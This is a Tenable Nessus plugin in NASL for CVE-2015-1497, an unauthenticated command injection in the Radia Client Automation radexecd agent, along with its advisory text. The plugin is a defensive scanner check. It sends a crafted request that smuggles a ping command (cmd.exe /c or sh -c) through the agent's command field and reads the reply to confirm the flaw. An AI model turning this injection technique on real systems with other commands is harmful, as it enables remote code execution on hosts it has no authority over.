Persistent Systems Radia Client Automation Agent Command Injection

2015-10-19T00:00:00
ID RADEXECD_CVE-2015-1497.NASL
Type nessus
Reporter Tenable
Modified 2018-07-26T00:00:00

Description

The Persistent Systems Radia Client Automation (formerly HP Client Automation) agent listening on the remote port is affected by a command execution vulnerability due to a flaw in the radexecd.exe component. An unauthenticated, remote attacker can exploit this to execute arbitrary commands in the context of the radexecd process.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(86427);
 script_version("1.6");
 script_cvs_date("Date: 2018/07/26 13:32:43");

 script_cve_id("CVE-2015-1497");
 script_bugtraq_id(72612);
 script_xref(name:"EDB-ID", value:"36169");
 script_xref(name:"EDB-ID", value:"36206");

 script_name(english:"Persistent Systems Radia Client Automation Agent Command Injection");
 script_summary(english:"Checks for a command execution vulnerability in Persistent Systems Radia Client Automation.");

 script_set_attribute(attribute:"synopsis", value:
"The Persistent Systems Radia Client Automation agent listening on the
remote port is affected by a command injection vulnerability.");
 script_set_attribute(attribute:"description", value:
"The Persistent Systems Radia Client Automation (formerly HP Client
Automation) agent listening on the remote port is affected by a
command execution vulnerability due to a flaw in the radexecd.exe
component. An unauthenticated, remote attacker can exploit this to
execute arbitrary commands in the context of the radexecd process."); 
 # https://support.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?56b928e5");
 script_set_attribute(attribute:"see_also", value:"http://www.zerodayinitiative.com/advisories/ZDI-15-038");
 script_set_attribute(attribute:"solution", value:
"See the vendor advisory for a possible solution.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"exploit_framework_core", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'HP Client Automation Command Injection');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/10");
 script_set_attribute(attribute:"plugin_publication_date", value:"2015/10/19");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:persistent_systems:radia_client_automation");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:client_automation_enterprise");
 script_set_attribute(attribute:"exploited_by_nessus", value:"true");
 script_end_attributes();

 script_category(ACT_ATTACK);
 script_family(english:"General");
 script_copyright(english:"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.");

 script_dependencies("ovcm_notify_daemon_detect.nasl", "os_fingerprint.nasl");
 script_exclude_keys("global_settings/supplied_logins_only");
 script_require_keys("Services/radexecd");
 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("dump.inc");

if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

# The port for the Notify daemon (radexecd)
port = get_service(svc:'radexecd', default:3465, exit_on_fail:TRUE);

# Attack only if the detection plugin determines noauth is enabled 
# for radexecd 
if (get_kb_item("radexecd/" + port + "/noauth") != TRUE)
  exit(0, "User authentication for radexecd on port " + port + " seems to be enabled, skipping the attack.");

os = get_kb_item("Host/OS");
if(os && "windows" >< tolower(os))
{
  injected = 'cmd.exe /c ping ' + this_host();
  cmd = 'hide hide"\t"' + injected;
}
# Injected command may fail if it is not available on the target 
# host, but a vulnerable server will still return '\x00' in response.
else
{
  injected = 'sh -c "ping -c 3 ' + this_host() + '"';
  cmd = 'hide hide\t' + injected; 
}

s = open_sock_tcp(port);
if(!s) audit(AUDIT_SOCK_FAIL, port);

req = '\x00' +  # return port; insignificant
      'USER_' + SCRIPT_NAME + '\x00' +
      'PASS_' + SCRIPT_NAME + '\x00' +
      cmd + '\x00';

send(socket: s, data: req);
res = recv(socket: s, length:1024);
close(s);

if (isnull(res)) 
  audit(AUDIT_RESP_NOT, port, "a Notify request");

# Vulnerable
if (res == '\x00')
  security_hole(port: port);
else
  exit(0, "The service listening on port " + port + ' returned the following response, and is probably not affected.\n' + hexdump(ddata:res));